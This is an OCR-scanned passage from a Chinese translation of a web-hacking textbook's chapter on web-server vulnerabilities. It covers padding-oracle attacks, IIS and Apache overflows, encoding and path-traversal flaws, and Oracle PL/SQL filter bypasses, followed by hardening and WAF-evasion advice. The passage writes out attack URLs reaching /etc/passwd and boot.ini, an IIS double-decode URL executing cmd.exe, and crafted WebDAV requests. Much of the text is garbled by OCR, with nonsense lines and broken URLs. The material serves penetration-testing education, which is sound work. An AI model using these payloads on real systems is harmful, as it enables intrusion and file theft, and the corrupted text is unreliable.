的 情况 下 ， 攻 击 者 将 选择 x 的 值 (该 值 的 最 后 一 个 字 节 将 解密 为 
0x02) 。 然 后 ， 他 对 初始 化 辐 量 中 的 倒数 第 二 个 字符 执行 以 上 递归 过 
程 ， 并 收 到 500 Internal Server Error 消 息 ， 直 到 倒数 第 二 个 解密 的 字 节 
为 0x02。 这 时 ， 消 息 来 尾 存在 两 个 0x02 字 节 ， 这 是 有 效 的 填充 ， 因 而 
不 会 返回 任何 错误 。 然 后 ， 可 以 对 目标 分 组 中 的 所 有 数据 位 、 随 后 的 
密 文 分 组 ， 以 及 消息 中 的 所 有 分 组 递归 应 用 同样 的 过 程 。 

这 样 ， 攻 击 者 即 可 以 解密 整 条 消息 。 有 趣 的 是 ， 攻 击 者 还 可 以 采 
FAERIE DURA ° PR — SAAC FEAF BJS, BOR) DME RIVE 
生成 所 选 的 明文 字符 串 。ScriptResource.axd 是 一 个 最 佳 攻 击 目标 。 
ScriptResource 的 4 参数 是 一 个 加 密 的 文件 名 。 如 果 攻 击 者 选择 
web.config 作 为 文件 名 ， 将 能 够 获得 具体 的 文件 ， 因 为 ASPNET 会 避 开 
IS 实 施 的 有 天 文件 处 理 方面 的 常规 限制 。 例 如 : 


dnrl_wWtsftZivoZéIXvG8Ocxws 6ULzFoKt-63276895315 


T 注解 一 般 而 言 ， 以 上 攻击 适用 于 任何 使 用 pKCS #5 填充 的 


CBC 密 码 。 此 类 攻击 最 初 于 2002 年 为 人 们 所 知 ， 它 的 主要 目标 

为 .NET， 因 为 .NET 对 会 话 令 牌 、ViewState 和 ScriptResource.axd 使 用 
PKCS #5 填充 。 请 访问 
www.iacr.org/archive/eurocrypt2002/23320530/cbc02_e02d.pdf£& [ni] Pf 
论 这 种 攻击 的 原始 论文 。 


警告 通常 ， 人 们 并 不 认真 看 待 “ 绝 不 要 公开 自己 的 加 密 算 


法 ”这 人 句 话 。 然 而 ， 第 7 章 介绍 的 位 翻转 攻击 和 上 述 填充 提示 攻 
击 均 表 明 ， 任 何 微不足道 的 漏洞 都 可 能 导致 非常 可 怕 的 后 果 。 
因此 ， 绝 不 要 公开 目 己 的 加 密 算 法 。 


尝试 访问 


http://mdsec.net/private/ 


18.2.2 HR 


由 于 攻击 者 可 以 利用 缓冲 区 溢出 控制 易 受 攻击 的 进程 ， 因 此 ， 这 
种 漏洞 是 影响 各 种 软件 的 最 严重 的 漏洞 (请 参阅 第 16 章 了 解 相关 内 
容 ) 。 如 有 条 攻 击 者 能 够 在 Web 服 务 器 中 执行 任意 代码 ， 他 天 能 攻破 其 
中 运行 的 任何 应 用 程序 。 

下 面 仅 介绍 少数 几 种 Web 服务器 缓冲 区 汶 出 漏洞 ; 但 这 足以 证 明 
这 种 漏洞 的 普遍 性 ， 它 存在 于 大 量 Web 服 务 器 产品 与 组 件 中 。 

1. Apache mod_isapi 巧 挂 指针 

2010 年 ， 人 们 发 现 了 一 个 漏洞 。 如 果 Apache 中 存在 该 漏洞 ， 在 过 
到 错误 时 ， 系 统 将 强制 从 内 存 中 纯 载 mod_isapi。 不 过 ， 对 应 的 函数 指 
针 仍 保留 在 内 存 中 ， 并 且 可 以 在 引用 相应 的 ISAPI 函 数 时 被 调用 ， 从 而 
访问 内 存 的 任意 部 分 。 

有 关 此 漏洞 的 详细 信息 ， 请 访问 : 
www.senseofsecurity.com.au/advisories/SOS-10-002 ° 

2. Microsoft IIS ISAPI 扩 展 

Microsoft IIS 4 与 5 包含 一 系列 默认 激活 的 ISAPI 扩 展 。2001 年 ， 人 
们 发 现 其 中 几 个 扩展 存在 缓冲 区 淤 出 漏洞 ， 包 括 Internet Printing 
Protocol 扩 展 与 Index Server 扩 展 。 这 些 漏洞 使 攻击 者 能 够 在 Local 
System 权限 下 执行 任意 代码 ， 进 而 完全 控制 整个 计算 机 ， 并 以 此 为 基 
础 传播 Nimda 与 Code Red 蠕 虫 ， 随 后 将 它们 迅速 扩散 。 下 面 的 
Microsoft TechNet 公 告 牌 详细 说 明了 这 些 漏洞 : 

 www.microsoft.com/technet/security/bulletin/MS01-023.mspx; 

 www.microsoft.com/technet/security/bulletin/MS01-033.mspx ° 

e 七 年 以 后 

2008 年 ， 人 们 在 IPP 服 务 中 发 现 了 另 一 个 漏洞 。 这 次 ， 部 署 到 
Windows 2003 和 Windows 2008 上 的 大 多 数 IIS 版 本 都 不 会 立即 受到 攻 
击 ， 因 为 这 些 系 统 默认 禁用 该 扩展 。 请 访问 


www.microsoft.com/technet/security/bulletin/ms08-062.mspx 查 看 
Microsoft 发 布 的 相关 建议 。 

3. Apache 分 块 编码 溢出 

2002 年 ， 人 们 在 Apache Web 服 务 器 中 发 现 一 个 由 整数 符号 错误 导 
致 的 缓冲 区 溢出 漏洞 。 存 在 漏洞 的 代码 被 重复 用 在 许多 其 他 Web 服 务 
圳 产品 中 ， 使 这 些 产 品 也 受到 影响 。 详 情 请 访问 
www.securityfocus.com/bid/5033/discuss ° 

@ 八 年 以 后 

2010 年 ， 人 们 发 现 Apache 的 mod_proxy 在 处 理 HTTP 别 应 中 的 分 块 
编码 时 存在 整数 淤 出 。 请 访问 www.securityfocus.comy/bid/37966 了 解 有 
天 此 漏洞 的 介绍 。 

4. WebDAV 涪 出 

2003 年 ， 人 们 发 现 Windows 操 作 系统 的 一 个 核心 组 件 中 存在 缓冲 
区 次 出 漏洞 。 这 个 漏洞 可 被 各 种 攻击 问 量 利用 ， 对 许多 客户 而 言 ， 其 
中 最 重要 的 是 IIS 5 内 置 的 WebDAV 文 持 。 在 修复 之 前 ， 这 个 漏洞 曾 被 
攻击 者 广泛 利用 。 欲 知 该 漏洞 的 详情 ， 请 访问 
www.microsoft.com/technet/security/bulletin/MS03-007.mspx ° 

e 七 年 以 后 

实施 WebDAV 导 致 一 系列 Web 服 务 器 出 现 漏 洞 。 

2009 年 ， 人 们 发 现 Apache 的 mod_dav 扩 展 存在 另 一 个 缓冲 区 淤 出 
漏洞 。 欲 知 有 天 详情 ， 请 访问 http:/cve.mitre.org/cgi-bin/cvename.cgi? 
name=CVE-2010-1452 ° 

2010 年 ， 人 们 发 现 ，OPTIONS 请 求 中 的 超 长 路 径 会 导致 Sun 公 司 
的 Java System Web Server 出 现 溢 出 。 有 关 此 漏洞 的 详情 ， 请 访问 
www.exploit-db.com/exploits/14287/ ° 


QU See rae, BEAT AT CME A AS TT STAN LSE A AN 
进行 编码 ， 以 方便 通过 HTTP 安 全 传送 。 如 果 Web 应 用 程序 中 存在 儿 种 
类 型 的 漏洞 ， 攻 击 者 束 可 以 利用 这 些 编码 方案 避 开 输入 确认 检查 ， 实 
施 其 他 攻击 。 

许多 Web 服 务 硕 软件 中 都 存在 编码 漏洞 ， 如 有 果 用 户 提交 的 相同 数 
据 被 使 用 各 种 技术 的 几 个 保护 层 处 理 ， 编 码 漏 洞 吏 会 造成 挛 重 的 威 
胁 。 一 个 典型 的 Web 请 求 可 能 被 Web 服 务 器 、 应 用 程序 平台 、 各 种 托 


管 与 非 托 管 API、 其 他 软件 组 件 与 基础 操作 系统 处 理 。 如 果 不 同 的 组 
件 以 不 同 的 方式 执行 一 种 编码 方案 ， 或 者 对 部 分 编码 的 数据 进行 其 他 
， 那 么 攻击 者 束 可 以 利用 这 种 行为 避 开 过 小 或 造成 其 他 反 
WITH ° 

KIDE E HS RS AAA a L, I 
它 总 是 涉及 与 操作 系统 的 通信 。 在 第 10 章 中 ， 我 们 介绍 了 Web 应 用 程 
序 中 的 路 径 遇 历 漏洞 。 各 种 web 服务 右 软 件 中 也 可 能 存在 这 种 类 型 的 
漏洞 ， 导 致 攻击 者 能 够 读 取 或 写 入 Web 根 目 孙 以 外 的 任何 文件 。 

1. Apple iDisk Server kí% H 

Apple iDisk Server 是 一 项 流行 的 云 同步 存储 服务 。2009 年 ， 
Jeremy Richards 发 现 其 易于 受到 路 径 志 有 历 攻 击 。 

iDisk 用 户 的 目录 结构 中 包含 一 个 公共 目录 ， 该 目录 的 内 容 可 由 未 
授权 的 互联 网 用 户 访 问 。Richards 发 现 ， 通 过 使 用 Unicode 字 符 从 该 公 
共 文 件 夹 遇 历 来 访问 私有 文件 ， 即 可 从 用 户 的 iDisk 的 私有 部 分 获取 任 
意 内 容 ， 如 下 所 示 : 


http: //idisk.mac.com/Jeremy. richards-Public/%2E%2E$2FPRIVATES.txt?dispesition= 


此 外 ， 还 可 以 首先 提出 WebDAV PROPFIND 请 求 来 列 出 i 


ebdGav 


Disk 的 内 容 : 


-method 


POST /Jeremy.richards-Public/<strone>$2Et2Et2Fr/<strong>?w 


PROPFIND 


2. Ruby WEBrick Web 服务 器 
WEBrick 是 一 个 作为 Ruby 的 一 部 分 提供 的 web 服务 器 。 人 们 发 现 
该 服务 器 易于 受到 以 下 简单 形式 的 遍历 攻击 : 


hctp:// [server]: [port]/..%5e..%5c. .5c. .%5c. .%5c. 850.. 852. . 5c. . 85c/boot. ini 


欲 知 该 漏洞 的 详情 ， 请 访问 www.securityfocus.com/bid/28123。 

3. Java Web 服 务 器 目录 遍历 

此 路 径 涡 历 漏洞 源 于 VM 并 不 解码 UTF-8 这 一 事实 。Tomcat 即 是 
一 种 以 Java 编 写 并 使 用 易 受 攻击 的 JVM 版 本 的 Web 服 务 器 。 使 用 UTF-8 
编码 的 ../ 序 列 可 从 中 检索 任意 内 容 : 


htto: //www. target.com/%c0taetcOtae/tcOtaetcl tae/tcbtaetcOtae/ etc/oasswa 


欲 知 该 漏洞 的 详情 ， 请 访问 http:/tomcat.apache.org/security-6.html。 
4. Allaire JRun 目 录 列 表 漏 洞 


2001 年 ， 人 们 在 Allaire JRun 中 发 现 一 个 漏洞 ， 即 使 目录 中 包含 
index.html 之 类 的 默认 文件 ， 攻 击 者 仍然 可 以 利用 这 个 漏洞 获取 目录 列 
表 。 攻 击 者 可 以 使 用 以 下 形式 的 URL 获 取 目 录 列 表 : 


https://wahh-app.com/dir/%3f.jsp 


%3f 是 问号 的 URL 编 码 形式 ， 它 常用 在 查询 字符 串 的 开始 部 分 。 
漏洞 之 所 以 产生 ， 是 因为 最 初 URL 解 析 器 并 未 将 %3{ 解 释 为 查询 字符 
串 指示 符 。 因 此 ， 服 务 器 认为 URL 以 .jsp 结 尾 ， 将 请 求 提交 给 负责 JSP 
文件 请 求 的 组 件 处 理 。 然 后 ， 这 个 组 件 对 %3fj 进 行 解码 ， 把 它 解释 为 
查询 字符 串 的 开始 部 分 ， 并 发 现 得 到 的 基础 URL 不 是 一 个 JSP 文 件 ， 于 
是 它 返 回 目录 列表 。 欲 知 详情 ， 请 访问 
www.securityfocus.com/bid/3592 ° 

@ 八 年 以 后 

2009 年 ， 人 们 发 现 ， 在 目录 名 以 问号 结尾 时 ，Jetty 中 存在 一 个 目 
杂 裔 历 相 关 的 类 似 低 风 险 漏洞 。 要 解决 此 漏洞 ， 需 要 将 ? 编码 为 %3f 。 
欲 知 详情 ， 请 访问 https:/www.kb.cert.org/vuls/id/402580 ° 

5. Microsoft IIS Unicode 路 径 遍 历 漏 洞 

Microsoft IIS 服 务 器 中 的 两 个 相关 漏洞 分 别 于 2000 年 与 2001 年 被 发 
现 。 为 防止 路 径 遇 有 历 攻击 ，IIS 在 包 合 点 一 点 一 笠 线 序列 的 请 求 中 碍 找 
它 的 字面 量 与 URL 编 码 形式 。 如 果 某 个 请 求 中 没有 这 些 表 达 式 ，IIS 服 
务 独 束 会 接受 这 个 请 求 ， 然 后 做 进一步 处 理 。 但 是 ， 接 下来， 服务器 
对 被 请 求 的 URL 进 行 了 额外 的 规范 化 处 理 ， 使 得 攻击 者 能 够 避 开 过 
滤 ， 让 服务 絮 处 理 裔 历 序列 。 

在 第 一 个 漏洞 中 ， 攻 击 者 可 以 提交 点 一 点 一 斜 线 序列 的 各 种 非法 
Unicode 编 码 形 式 ， 如 ..%c09%af。 这 个 表达 式 与 IS 的 前 沿 过 滤器 

(upfront filter) 并 不 匹配 ， 但 随后 的 处 理 过 程 接受 这 种 非法 编码 ， 并 
将 它 转 换 成 一 个 字面 量 裔 历 序列 。 这 使 攻击 者 能 够 侵入 Web 根 目录 以 
外 的 目录 ， 并 使 用 下 面 的 URL 执 行 任意 命令 : 


ipts/..%cO%af..%cO%af. .ScO%af. .ScO%af. .ScO%af../ 


3://wahh-app.com/scr 


在 第 二 个 漏洞 中 ， 攻 击 者 可 以 提交 点 一 点 一 斜 线 序列 的 双重 编码 
形式 ， 如 ..9%255c。 同 样 ， 这 个 表达 式 也 与 IS 的 过 滤器 不 相 匹配 ， 但 随 
后 的 处 理 过 程 对 输入 进行 “过 剩 解码 ”(superfluous decode) ， 因 而 将 


其 转换 成 一 个 字面 量 遇 历 序列 。 这 样 ， 攻 击 者 吏 可 以 使 用 下 面 的 URL 
实施 男 一 次 攻击 : 


https://wahh-app.com/scripts/..%255c. .$255c. .$255cC. .%255cC. .255c.. 


$255cwinnt/system32/cmd,exe?/c+dir+c: \ 

欲 知 这 些 漏 洞 的 详情 ， 请 访问 : 

Dwww.microsoft.com/technet/security/bulletin/MS00-078.mspx 

g www.microsoft.com/technet/security/bulletin/MS01-026.mspx 

@ 九 年 以 后 

2009 年 ， 人 们 又 在 WebDAV 中 发 现 类 似 的 IS 漏 洞 ， 这 说 明 Web 服 
务 器 软件 中 的 编码 与 规范 化 漏洞 始终 是 一 个 安全 隐患 。 受 IIS 保 护 的 文 
件 可 以 通过 在 URL 中 插入 恶意 %c0%af 字 符 串 进行 下 载 。 

由 于 以 下 请 求 看 起 来 并 不 是 一 个 针对 受 保 护 文件 的 请 求 ，ISS 会 授 
权 其 访问 相关 资源 的 权限 ， 但 恶意 字符 串 随 后 会 从 请 求 中 删除 : 


GET /prote*%eO%afcted/protected.zip HTTP/1.1 
Translate: £ 


Connection: close 
Host: wahh-app.net 


Translate: NH EAH TRAE RKA WebDAV 展 处 理 。 使 用 以 
下 代码 可 以 在 WebDAV 请 求 中 直接 实施 相同 的 攻击 : 


PROPFIND /protec%c0%afted/ HTTP/1.1 
Host: wahh-app.net 

User-Agent: neo/0.12.2 

Connection: TE 

TE: trailers 

Depth: 1 

Content-Length: 288 

Content-Type: application/xml 

<?xml version="1.0" encoding="utf£-8"?> 
<propfind xmlns="DAV: "><prop> 
<getcontentlength xmlns="DAV:"/> 
<getlastmodified xmlns="DAV:"/> 
<executable xmlns="http://apache.org/dav/props/"/> 
<resourcetype xmlns="DAV:"/> 
<checked-in xmlns="DAV:"/> 
<checked-out xmlns="DAV:"/> 
</prop></propfind> 


欲 知 详情 ， 请 访问 www.securityfocus.com/bid/34993/。 

6. 避 开 Oracle PL/SQL 排 除 列 表 

前 面 我 们 提 到 ， 可 通过 Oracle 的 PL/SQL 网 关 访问 危险 默认 功能 。 
为 解决 这 个 问题 ，Oracle 创 建 了 PL/SQL 排 除 列表 (Exclusion List) ， 
它 阻止 攻击 者 访问 以 某 些 表达 式 (如 OWA 与 SYS) 开头 的 包 。 

2001~20074F LIS, David Litchfield 发 现 了 一 系列 避 开 PL/SQL 排 
除 列表 的 方法 。 在 第 一 个 漏洞 中 ， 在 包 名 称 前 插入 空白 符 (如 换行 
符 、 空 格 或 制 表 符 ) 即 可 避 开 过 滤 。 例 如 : 


https://wahh-app.com/pls/dad/%0ASYS.package.procedure 


这 个 URL 可 避 开 过 滤 ， 由 于 后 站 数据 库 忽 略 空 日 符 ， 因 此 危险 的 包 得 
以 执行 。 

在 第 二 个 漏洞 中 ， 用 代表 字符 的 %FF 兰 代 子 母 Y， 即 可 避 开 过 
JE: 


https: //wahh-app.com/pls/dad/S%FFS.package.procedure 


这 个 URL 可 避 开 过 减 ， 后 端 数据 库 对 字符 进行 规范 化 处 理 ， 将 其 恢复 
到 标准 的 字母 Y， 从 而 调用 危险 的 包 。 


在 第 三 个 漏洞 中 ， 用 双 3 引 号 包含 一 个 被 阻止 的 表达 式 即 可 如 开 过 


y 
We: 
https://wahh-app.com/pls/dad/"SYS" .package. procedure 


这 个 URL 可 避 开 过 滤 ， 后 端 数据 库 接 受 补 引用 的 包 名 称 ， 意 味 着 它 可 
调用 危险 的 包 。 

在 第 四 个 漏洞 中 ， 使 用 尖 括 号 在 被 阻止 的 表达 式 前 放置 一 个 编程 
的 goto 标 签 ， 即 可 避 开 过 滤 : 


https: //wahh-app.com/pls/dad/<<FOO>>SYS.package.procedure 


aaa 后 端 数据 库 忽略 goto 标 签 ， 使 得 危险 的 包 得 以 
行 。 

由 于 前 端 过 滤 由 一 个 组 件 根 据 简单 的 文本 模式 匹配 执行 ， 而 随后 
的 处 理 过 程 却 由 男 一 个 组 件 执行 ， 并 且 它 们 按照 自己 的 规则 解释 输入 
的 句法 与 语法 意义 ， 因 而 造成 了 以 上 各 种 漏洞 。 这 两 组 规则 之 间 的 任 
何 差 异 都 可 能 会 被 攻击 者 利用 ， 提 交 与 过 滤器 所 使 用 的 模式 不 相 匹 配 
的 输入 ， 但 数据 库 却 按 攻击 者 希望 的 方式 解释 这 个 输入 ， 调 用 危险 的 
包 。 由 于 Oracle 数 据 库 的 功能 极其 强大 ， 因 而 这 种 差异 大 量 存 在 。 

欲 知 这 些 漏 洞 的 详情 ， 请 访问 : 

DQ www.securityfocus.com/archive/1/423819/100/0/threaded 

Q The Oracle Hacker's Handbook, 1# David Litchfield (Wiley, 
2007) 

e 七 年 以 后 

2008 年 ， 人 们 在 Portal Server (Oracle Application Server 的 一 部 
ay) 中 发 现 一 个 漏洞 : 如 果 攻 击 者 具有 以 %0A 结 尾 的 会 话 ID cookie 
值 ， 就 可 以 避 开 “基本 验证 ”检查 。 


如 果 运 气 不 错 的 话 ， 有 的 渗透 测试 员 会 在 所 针对 的 Web 服 务 器 中 
找到 本 章 描述 的 一 些 漏 洞 。 然 而 ， 它 们 很 可 能 已 经 升级 到 了 最 新 的 版 
本 ， 渗 透 测 试 员 需 要 得 找 一 些 当前 或 最 新 的 漏洞 ， 利 用 它们 攻击 服务 


在 Web 服 务 磊 等 非 定 制 产 品 中 查找 漏洞 时 ， 使 用 目 动 化 扫 朱 工具 
征 一 个 不 错 的 起 点 。 与 Web 应 用 程序 这 些 定 制 产品 不 同 ， 几 乎 所 有 的 


Web 服 务 圳 都 使 用 第 三 方 软件 ， 并 且 有 无 数 用 户 已 经 以 相同 的 方式 安 
装 和 配置 了 这 些 软件 。 在 这 种 情况 下 ， 使 用 目 动 化 扫描 器 发 送 大 量 专 
门 设计 的 请 求 并 监控 表示 已 知 漏洞 的 签名 ， 束 可 以 迅速 、 高 效 地 确定 
了 最 明显 的 漏洞 。Nessus 是 一 款 非常 不 错 的 免费 漏洞 扫描 器 ， 当 然 也 可 
以 使 用 各 种 商业 扫描 左 。 

除 使 用 扫描 工具 外 ， 渗 透 测 试 员 还 应 始终 对 所 攻击 的 软件 进行 深 
入 研究 。 同 时 ， 浏 览 Security Focus、OSVDB、 邮 件 列 表 Bugtraq 和 Full 
Disclosure 等 资源 ， 在 目标 软件 上 查找 所 有 最 近 发 现 的 、 尚 未 修复 的 漏 
润 信息 。 同 时 ， 别 饼 记 查看 Exploit Database 和 Metasploit， 看 看 是 不 是 
人 

| ZN: 

g www.exploit-db.com 

Dwww.metasploit.com/ 

Dwww.grok.org.uk/full-disclosure/ 

口 http:/osvdb.org/searchy/advsearch 

还 要 注意 ， 一 些 Web 应 用 程序 产品 中 内 置 了 开源 Web 服 务 器 ， 如 
Apache 或 Jetty。 因 为 管理 员 把 服务 器 看 作 他 们 所 安装 的 应 用 程序 ， 而 
不 是 他 们 负责 的 基础 以 构 的 一 部 分 ， 所 以 这 些 捆绑 服务 器 的 安全 更 新 
也 应 用 得 相对 较为 缓慢 。 而 且 ， 在 这 种 情况 下 ， 标 准 的 服务 标题 也 已 
被 修改 。 因 此 ， 对 所 针对 的 软件 进行 手动 测试 与 研究 ， 可 以 非常 有 效 
地 确定 自动 化 扫 摘 工具 无 法 发 现 的 漏洞 。 

如 有 可 能 ， 渗 透 测试 员 应 该 考虑 在 本 地 安装 所 攻击 的 软件 ， 并 目 
己 进 行 测试 ， 查 找 任 何 尚未 发 现 的 新 漏洞 或 广泛 流传 的 漏洞 。 


18.2.5 Web 服 务 器 软件 的 安全 


从 某 种 程度 上 讲 ， 部 署 第 三 方 Web 服 务 器 产品 的 组 织 的 命运 掌握 
在 软件 供应 商 手 中 。 然 而 ， 具 有 安全 意识 的 组 织 仍然 可 以 采取 大 量 有 
用 的 措施 保护 目 己 ， 避 开本 章 描述 的 各 种 软件 凋 洞 。 

1. 选择 记录 良好 的 软件 

并 非 所 有 软件 产品 与 供应 商都 提供 同等 优 民 的 服务 。 分 析 几 种 不 
同 的 服务 器 产品 的 最 近 历 史 可 以 发 现 ， 它 们 在 存在 的 严重 漏洞 数量 、 
供应 商 修 复 这 些 漏洞 是 否 及 时 以 及 发 布 的 补丁 在 随后 测试 过 程 中 表现 
的 适应 性 等 方面 存在 明显 的 差异 。 在 克 择 部 团 何 种 Web 服 务 器 软件 之 
前 ， 应 该 研究 这 些 差 异 ， 并 考虑 如 来 所 在 的 组 织 采用 了 选择 的 软件 ， 
它 在 近 儿 年 将 会 如 何 运 转 。 


2. 应 用 供应 商 发 布 的 补丁 

任何 有 责任 的 软件 供应 商 必须 定期 发 布 安全 更 新 。 有 了 时， 这 些 补 
丁 能 够 解决 供应 两 上 自身 在 内 部 发 现 的 问题 ， 其 他 情况 下 ， 软 件 问 题 由 
专门 的 研究 员 上 报 ， 但 我 们 无 法 确定 他 是 否 保 留 了 一 些 信息 。 其 他 漏 
洞 因为 被 攻击 者 广泛 利用 ， 因 而 引起 供应 商 的 注意 。 但 是 ， 无 论 是 上 
述 哪 一 种 情况 ， 一 旦 供应 商 发 布 补丁 ， 任 何 强大 的 逆 同 工程 方法 都 能 
立即 查 明 它 所 解决 的 问题 所 在 ， 使 攻击 者 能 够 着 手 设计 利用 这 个 问题 
的 攻击 。 因 此 ， 如 果 可 行 ， 应 尽 可 能 及 时 地 应 用 安全 补丁 。 

3. 实施 安全 强化 

大 多 数 Web 服 务 絮 都 拥有 大 量 的 配置 选项 ， 可 控制 在 其 中 激活 哪 
些 功 能 ， 同 时 控制 它们 的 运行 状态 。 如 果 无 用 的 功能 (如 默认 ISAPI 扩 
E) 仍然 被 激活 ， 那 么 只 要 攻击 者 在 这 项 功能 中 发 现 新 的 漏洞 ， 服 务 
右 职 会 受到 严重 的 攻击 威胁 。 用 户 应 该 查阅 与 所 使 用 的 软件 有 关 的 强 
化 指南 ， 同 时 还 应 考虑 采用 以 下 这 些 常 用 的 强化 步骤 。 

口 禁 用 任何 不 需要 的 内 置 功能 ， 配 置 剩 下 的 功能 尽 可 能 严格 地 运 
行 ， 与 商业 需求 保持 一 致 。 这 包括 删除 映 映 的 文件 扩展 名 、Web 服 务 
句 模 块 和 数据 库 组 件 。 可 以 使 用 IIS Lockdown 等 工具 迅速 完成 这 项 任 
Poi 


口 WF A Be ee A AS He RS AE RS as ZA 
成 ， 则 应 考虑 是 否 可 以 使 用 托管 代码 重新 编写 这 些 扩展 。 如 有 果 不 能 ， 
E E EA 然后 再 将 输入 传递 给 这 
些 功能 。 

口 可 以 对 需要 保留 的 许多 功能 与 资源 进行 重 命名 ， 以 防止 攻击 者 
利用 它们 实施 男 一 层 障 碍 。 即 使 搁 术 熟练 的 攻击 者 仍然 能 够 发 现 重合 
名 后 的 名 称 ， 但 这 种 模糊 处 理 可 以 阻止 攻击 者 新 手 与 目 动 化 蠕虫 。 

口 在 整个 技术 栈 中 应 用 最 低 权 限 原 则 。 例 如 ， 应 配置 Web 服 务 器 
进程 使 用 最 低 权 限 的 操作 系统 账户 。 还 可 以 在 UNIX 系 统 上 使 用 chroot 
环境 进一步 限制 任何 攻击 的 影响 苑 围 。 

4. 监控 新 的 漏洞 

应 指派 一 名 组 织 职员 负责 监控 Bugtraq 与 Full Disclosure 等 资源 ， 碍 
找 与 所 使 用 的 软件 中 新 发 现 的 漏洞 有 关 的 公告 与 讨论 。 还 可 以 预订 各 
种 私人 服务 ， 由 他 们 提供 软件 中 已 经 发 现 但 尚未 公开 披露 的 最 狐 漏 洞 
通知 。 通 常 ， 如 有 果 了 解 与 某 个 漏洞 有 关 的 技术 细 方 ， 束 可 以 在 供应 商 
发 布 完整 的 补丁 前 ， 有 效 地 修改 这 个 漏洞 。 

5. 使 用 深层 防御 


应 该 始终 实施 几 层 保护 ， 减 轻 基 础 架构 组 件 中 的 任何 安全 违反 造 
成 的 影响 。 可 以 采取 各 种 措施 ， 将 针对 Web 服 务 器 的 成 功 攻击 的 影响 
限制 在 局 部 范围 内 。 即 使 Web 服 务 絮 被 完全 攻破 ， 这 些 措 施 也 让 用 户 
有 足够 的 时 间 防 止 任何 严重 的 数据 泄露 。 

口 可 以 限制 Web 服 务 絮 访问 其 他 自治 的 应 用 程序 组 件 。 例 如 ， 应 
只 允许 应 用 程序 使 用 的 数据 库 账户 INSERT 访 问 用 于 保存 审计 日 志 的 
表 ; 这 意味 着 ， 即 使 攻击 者 攻破 Web 服 务 器 ， 他 也 无 法 删除 已 经 创建 
的 任何 日 志 记 录 。 

口 可 以 对 进出 Web 服务 器 的 流量 实施 严格 的 网 络 级 过 滤 。 

口 可 以 使 用 一 个 入 侵 检 测 系 统 确定 任 何 表明 发 生 安全 违反 的 反常 
网 络 活动 。 攻 破 Web 服 务 器 后 ， 许 多 攻击 者 会 立即 党 试 建立 反 回 连 
接 ， 侵 入 因特网 ， 或 者 扫描 DMZ 网 络 中 的 其 他 主机 。 高 效 的 入 侵 检 测 
系统 将 实时 通知 这 些 事 件 ， 以 便 用 户 采取 措施 阻止 攻击 。 


18.3 Web 应 用 程 火 墙 


许多 应 用 程序 都 受到 某 种 外 部 组 件 的 保护 ， 这 些 组 件 或 者 位 于 应 
用 程序 所 在 的 同一 主机 上 ， 或 者 位 于 基于 网 络 的 设备 上 ; 它们 要 么 执 
行 入 侵 防 御 (应 用 程序 防火 墙 ， 要 么 执行 入 侵 检 测 (如 传统 的 入 侵 
检测 系统 ) 。 由 于 这 类 设备 用 于 确定 攻击 的 方法 基本 类 似 ， 因 此 ， 我 
们 将 把 它们 当做 同一 类 设备 看 待 。 虽 然 许多 人 认为 安装 这 类 设备 总 比 
什么 都 不 做 要 强 ， 但是， 许多 时 候 ， 它 们 会 造成 一 种 错误 的 安全 意 
识 ， 人 们 觉得 : 既然 实施 了 另 一 层 防 御 ， 安 全 状况 将 会 目 动 改善 。 虽 
然 此 类 系统 并 不 会 降低 安全 防御 ， 并 且 可 以 阻止 目标 明确 的 攻击 (如 
因特网 蠕虫 ) ， 但 在 许多 情况 下 ， 它 并 不 像 人 们 认为 的 那样 能 够 显 车 
改善 安全 状况 。 

值得 注意 的 是 ， 除 非 此 类 防御 设备 采用 大 量 定 制 规则 ， 否 则 它们 
并 不 能 防御 我 们 在 第 4~8 章 中 讨论 的 任何 漏洞 ， 并 且 在 防范 业务 逻辑 
中 的 潜在 漏洞 (第 11 章 ) 方面 也 没有 任何 实际 用 途 。 同 时 ， 它 们 也 无 
法 防范 某 些 特定 的 攻击 ， 如 基于 DOM 的 XSS (12H) 。 至 于 其 他 漏 
洞 (利用 这 些 漏洞 的 攻击 会 表现 出 某 种 攻击 模式 ) ， 以 下 问题 通常 会 
降低 Web 应 用 程序 防火 墙 的 用 处 。 

口 如 果 防 火 墙 过 于 严格 地 遵循 HTTP 规 范 ， 它 可 能 会 对 应 用 程序 服 
务 器 如 何 处 理 请 求 做 出 假设 。 相 反 ， 网 络 层 防御 中 的 防火 墙 或 IDS 设 
备 通常 并 不 了 解 某 些 HTTP 传 输 方 法 的 细节 。 

口 请 求 通过 防火 墙 后 ， 在 处 理 请 求 的 过 程 中 ， 应 用 程序 服务 右 本 
村 可 能 会 修改 用 户 输入 ， 如 对 其 进行 解码 、 添 加 转 义 字符 ， 或 过 滤 掉 
特定 字符 串 。 前 儿 章 中 介绍 的 许多 攻击 步骤 均 以 避 开 输入 确认 为 目 
标 ， 应 用 程序 层 防火 墙 可 能 易于 受到 类 似 的 攻击 。 

口 许多 防火 墙 和 IDS 警 报 基于 特定 的 常见 攻击 有 效 载 倚 ， 而 不 是 基 
于 利用 漏洞 的 常规 方法 。 如 果 攻 击 者 能 够 检索 文件 系统 中 的 任意 文 
件 ， 针 对 /managerviewtempl?loc=/etc/passwd 的 请 求 可 能 会 被 阻止 ， 但 
针对 /manager/viewtempl?loc=/vavlog/syslog 的 请 求 并 不 会 被 视 为 攻击 ， 
即使 其 内 容 可 能 对 攻击 者 更 加 有 用 。 

从 整体 看 ， 我 们 并 不 需要 区 分 全 局 输入 确认 过 滤 硕 、 基 于 主机 的 
代理 或 基于 网 络 的 Web 应 用 程序 防火 场 。 以 下 步骤 适用 于 所 有 设备 。 


渗透 测试 步骤 


可 以 使 用 以 下 步骤 推 新 是 否 安装 了 Web 应 用 程序 防火 墙 。 

(1) 在 参数 值 中 使 用 明确 的 攻击 有 效 载荷 向 应 用 程序 (最 好 
是 响应 中 包含 名 称 或 值 的 某 个 应 用 程序 位 置 ) 提交 任意 参数 名 称 。 
如 采 应 用 程序 阻止 该 攻击 ， 这 可 能 是 由 于 外 部 防御 机 制 所 致 。 

(2) 如 果 可 以 提交 在 服务 器 响应 中 返回 的 变量 ， 则 提供 一 系 
列 模糊 测试 字符 串 及 这 些 字 符 串 的 编码 形式 可 以 确定 应 用 程序 的 用 
户 输入 防御 行为 。 

(3) 对 应 用 程序 中 的 变量 实施 相同 的 攻击 来 确认 这 一 行为 。 

在 笑 试 避 开 Web 应 用 程序 防火 墙 时 ， 可 以 提交 以 下 字符 串 。 

(1) 对 于 所 有 模糊 测试 字符 串 和 请 求 ， 使 用 标准 签名 数据 库 
